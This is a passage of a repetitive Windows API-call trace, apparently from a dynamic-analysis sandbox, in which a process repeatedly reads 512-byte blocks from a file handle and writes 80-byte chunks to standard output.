[0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.665] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec98*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.665] GetFileType (hFile=0x4c) returned 0x1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.665] WriteFile (in: hFile=0x4c, lpBuffer=0x2eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eece8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.665] GetFileType (hFile=0x4c) returned 0x1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.665] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed38*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.665] GetFileType (hFile=0x4c) returned 0x1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.665] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed88*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.665] GetFileType (hFile=0x4c) returned 0x1 [0225.665] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] WriteFile (in: hFile=0x4c, lpBuffer=0x2eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eedd8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.666] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] GetFileType (hFile=0x4c) returned 0x1 [0225.666] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] WriteFile (in: hFile=0x4c, lpBuffer=0x2eee28*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eee28*, lpNumberOfBytesWritten=0x2ede2c*=0x20, lpOverlapped=0x0) returned 1 [0225.666] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.666] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.666] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.666] ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x200, lpOverlapped=0x0) returned 1 [0225.666] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] GetFileType (hFile=0x4c) returned 0x1 [0225.666] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] GetFileType (hFile=0x4c) returned 0x1 [0225.666] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.666] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] GetFileType (hFile=0x4c) returned 0x1 [0225.666] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec98*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.666] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] GetFileType (hFile=0x4c) returned 0x1 [0225.666] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] WriteFile (in: hFile=0x4c, lpBuffer=0x2eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eece8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.666] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] GetFileType (hFile=0x4c) returned 0x1 [0225.666] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.666] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed38*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.667] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.667] GetFileType (hFile=0x4c) returned 0x1 [0225.667] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.667] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed88*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.667] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.667] GetFileType (hFile=0x4c) returned 0x1 [0225.667] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.667] WriteFile (in: hFile=0x4c, lpBuffer=0x2eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eedd8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.667] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.667] GetFileType (hFile=0x4c) returned 0x1 [0225.667] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.667] WriteFile (in: hFile=0x4c, lpBuffer=0x2eee28*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eee28*, lpNumberOfBytesWritten=0x2ede2c*=0x20, lpOverlapped=0x0) returned 1 [0225.667] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.667] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.667] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.667] ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x200, lpOverlapped=0x0) returned 1 [0225.667] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.667] GetFileType (hFile=0x4c) returned 0x1 [0225.667] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.667] GetFileType (hFile=0x4c) returned 0x1 [0225.667] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.667] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.667] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.667] GetFileType (hFile=0x4c) returned 0x1 [0225.667] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.667] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec98*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.668] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.668] GetFileType (hFile=0x4c) returned 0x1 [0225.668] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.668] WriteFile (in: hFile=0x4c, lpBuffer=0x2eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eece8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.668] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.668] GetFileType (hFile=0x4c) returned 0x1 [0225.668] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.668] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed38*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.668] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.668] GetFileType (hFile=0x4c) returned 0x1 [0225.668] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.668] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed88*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.668] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.668] GetFileType (hFile=0x4c) returned 0x1 [0225.668] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.668] WriteFile (in: hFile=0x4c, lpBuffer=0x2eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eedd8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.668] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.668] GetFileType (hFile=0x4c) returned 0x1 [0225.668] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.668] WriteFile (in: hFile=0x4c, lpBuffer=0x2eee28*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eee28*, lpNumberOfBytesWritten=0x2ede2c*=0x20, lpOverlapped=0x0) returned 1 [0225.668] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.668] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.668] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.668] ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x200, lpOverlapped=0x0) returned 1 [0225.668] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.668] GetFileType (hFile=0x4c) returned 0x1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] GetFileType (hFile=0x4c) returned 0x1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] GetFileType (hFile=0x4c) returned 0x1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec98*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] GetFileType (hFile=0x4c) returned 0x1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] WriteFile (in: hFile=0x4c, lpBuffer=0x2eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eece8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] GetFileType (hFile=0x4c) returned 0x1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed38*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] GetFileType (hFile=0x4c) returned 0x1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed88*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] GetFileType (hFile=0x4c) returned 0x1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] WriteFile (in: hFile=0x4c, lpBuffer=0x2eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eedd8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.669] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.669] GetFileType (hFile=0x4c) returned 0x1 [0225.670] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.670] WriteFile (in: hFile=0x4c, lpBuffer=0x2eee28*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eee28*, lpNumberOfBytesWritten=0x2ede2c*=0x20, lpOverlapped=0x0) returned 1 [0225.670] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.670] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.670] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.670] ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x200, lpOverlapped=0x0) returned 1 [0225.670] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.670] GetFileType (hFile=0x4c) returned 0x1 [0225.670] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.670] GetFileType (hFile=0x4c) returned 0x1 [0225.670] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.670] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.670] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.670] GetFileType (hFile=0x4c) returned 0x1 [0225.670] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.670] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec98*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.670] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.670] GetFileType (hFile=0x4c) returned 0x1 [0225.670] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.670] WriteFile (in: hFile=0x4c, lpBuffer=0x2eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eece8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.670] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.670] GetFileType (hFile=0x4c) returned 0x1 [0225.670] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.670] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed38*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.670] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.670] GetFileType (hFile=0x4c) returned 0x1 [0225.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.671] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed88*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.671] GetFileType (hFile=0x4c) returned 0x1 [0225.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.671] WriteFile (in: hFile=0x4c, lpBuffer=0x2eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eedd8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.671] GetFileType (hFile=0x4c) returned 0x1 [0225.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.671] WriteFile (in: hFile=0x4c, lpBuffer=0x2eee28*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eee28*, lpNumberOfBytesWritten=0x2ede2c*=0x20, lpOverlapped=0x0) returned 1 [0225.671] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.671] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.671] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.671] ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x200, lpOverlapped=0x0) returned 1 [0225.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.671] GetFileType (hFile=0x4c) returned 0x1 [0225.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.671] GetFileType (hFile=0x4c) returned 0x1 [0225.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.671] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.671] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.671] GetFileType (hFile=0x4c) returned 0x1 [0225.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.672] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec98*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.672] GetFileType (hFile=0x4c) returned 0x1 [0225.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.672] WriteFile (in: hFile=0x4c, lpBuffer=0x2eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eece8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.672] GetFileType (hFile=0x4c) returned 0x1 [0225.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.672] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed38*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.672] GetFileType (hFile=0x4c) returned 0x1 [0225.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.672] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed88*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.672] GetFileType (hFile=0x4c) returned 0x1 [0225.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.672] WriteFile (in: hFile=0x4c, lpBuffer=0x2eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eedd8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.672] GetFileType (hFile=0x4c) returned 0x1 [0225.672] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.672] WriteFile (in: hFile=0x4c, lpBuffer=0x2eee28*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eee28*, lpNumberOfBytesWritten=0x2ede2c*=0x20, lpOverlapped=0x0) returned 1 [0225.672] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.672] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.673] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.673] ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x200, lpOverlapped=0x0) returned 1 [0225.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.673] GetFileType (hFile=0x4c) returned 0x1 [0225.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.673] GetFileType (hFile=0x4c) returned 0x1 [0225.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.673] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.673] GetFileType (hFile=0x4c) returned 0x1 [0225.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.673] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec98*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.673] GetFileType (hFile=0x4c) returned 0x1 [0225.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.673] WriteFile (in: hFile=0x4c, lpBuffer=0x2eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eece8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.673] GetFileType (hFile=0x4c) returned 0x1 [0225.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.673] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed38*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.673] GetFileType (hFile=0x4c) returned 0x1 [0225.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.673] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed88*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.673] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.673] GetFileType (hFile=0x4c) returned 0x1 [0225.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.674] WriteFile (in: hFile=0x4c, lpBuffer=0x2eedd8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eedd8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.674] GetFileType (hFile=0x4c) returned 0x1 [0225.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.674] WriteFile (in: hFile=0x4c, lpBuffer=0x2eee28*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eee28*, lpNumberOfBytesWritten=0x2ede2c*=0x20, lpOverlapped=0x0) returned 1 [0225.674] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.674] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ede18 | out: lpNewFilePointer=0x0) returned 1 [0225.674] _get_osfhandle (_FileHandle=4) returned 0x54 [0225.674] ReadFile (in: hFile=0x54, lpBuffer=0x2eec48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ede38, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesRead=0x2ede38*=0x200, lpOverlapped=0x0) returned 1 [0225.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.674] GetFileType (hFile=0x4c) returned 0x1 [0225.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.674] GetFileType (hFile=0x4c) returned 0x1 [0225.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.674] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec48*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.674] GetFileType (hFile=0x4c) returned 0x1 [0225.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.674] WriteFile (in: hFile=0x4c, lpBuffer=0x2eec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eec98*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.674] GetFileType (hFile=0x4c) returned 0x1 [0225.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.674] WriteFile (in: hFile=0x4c, lpBuffer=0x2eece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eece8*, lpNumberOfBytesWritten=0x2ede2c*=0x50, lpOverlapped=0x0) returned 1 [0225.674] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.674] GetFileType (hFile=0x4c) returned 0x1 [0225.675] _get_osfhandle (_FileHandle=1) returned 0x4c [0225.675] WriteFile (in: hFile=0x4c, lpBuffer=0x2eed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ede2c, lpOverlapped=0x0 | out: lpBuffer=0x2eed38*, 